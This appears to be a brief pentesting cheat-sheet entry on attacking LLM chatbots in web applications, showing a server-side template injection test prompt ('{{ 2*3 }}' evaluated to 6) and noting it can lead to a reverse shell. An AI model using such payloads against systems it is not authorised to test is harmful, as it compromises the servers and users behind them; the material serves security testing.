icon

LLM Chatbot Pentesting

Last modified: 2025-03-12

An LLM chatbot in a web application can be abused with some exploit techniques.

SSTI

If the chatbot reflects our prompt in the response, we might be able to abuse it with SSTI. For example,

Prompt: How are you? {{ 2*3 }}

Response: I will answer your question "How are you? 6". I'm good, thanks! How about you?

If it works, we can achieve reverse shell.